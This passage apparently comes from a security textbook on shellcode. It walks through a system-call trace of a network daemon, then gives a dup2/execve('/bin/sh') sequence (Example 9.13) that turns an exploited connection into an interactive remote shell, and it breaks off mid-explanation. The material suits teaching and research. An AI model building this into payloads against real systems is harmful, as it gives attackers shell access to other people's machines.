
8 603 remote_format_strin RET accept 4
9 603 remote_format_strin CALL read(0x4,0xbfbff8f0,0x1f4
The program creates a network socket and starts listening on it.Then at line 7 a net-
work connection is accepted for which file descriptor number 4 is returned.Then the
daemon uses the file descriptor to read data from the client.
Imagine that at this point some sort of vulnerability that allows shellcode to be exe-
cuted can be triggered. All we would have to do to get an interactive shell is execute the
system calls in Example 9.13.
Example 9.13 dup
1 dup2(4,0);
2 dup2(4,1);
3 dup2(4,2);
4 execve("/bin/sh",0,0);
Analysis
First, we dup stdin, stdout, and stder ...